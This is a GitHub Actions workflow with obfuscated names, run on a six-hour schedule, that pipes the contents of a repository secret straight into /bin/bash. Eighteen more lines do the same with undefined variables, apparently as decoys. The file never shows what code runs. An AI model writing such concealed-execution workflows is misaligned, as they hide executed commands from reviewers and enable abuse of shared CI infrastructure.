name: tuishouyucu
on:
  workflow_dispatch:
  schedule:
    - cron: '57 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: tuishouyucu
        env:
          rbwu4: ${{ secrets.rbwu4 }}
        run: |
          echo $rbwu4 | jq -r .a89129 | /bin/bash
          echo $n7 | jq -r .abl5142 | /bin/bash
          echo $v397 | jq -r .c20420 | /bin/bash
          echo $jj4 | jq -r .hwwx3 | /bin/bash
          echo $wago6 | jq -r .ryrs03558 | /bin/bash
          echo $ldu76523 | jq -r .qayiu03 | /bin/bash
          echo $m830 | jq -r .luhk63772 | /bin/bash
          echo $yzo1146 | jq -r .sk858 | /bin/bash
          echo $pvbhc1 | jq -r .wnlls53 | /bin/bash
          echo $hgzb761 | jq -r .u6 | /bin/bash
          echo $mcpdf00 | jq -r .lxqhz671 | /bin/bash
          echo $lc13380 | jq -r .ugjv9 | /bin/bash
          echo $kxifj90673 | jq -r .idpzq53 | /bin/bash
          echo $omr4 | jq -r .bs1 | /bin/bash
          echo $lhxw5255 | jq -r .tebob9021 | /bin/bash
          echo $bp51 | jq -r .yj6750 | /bin/bash
          echo $u1 | jq -r .psafh2 | /bin/bash
          echo $qh75 | jq -r .l1 | /bin/bash
          echo $ywo004 | jq -r .fq3134 | /bin/bash

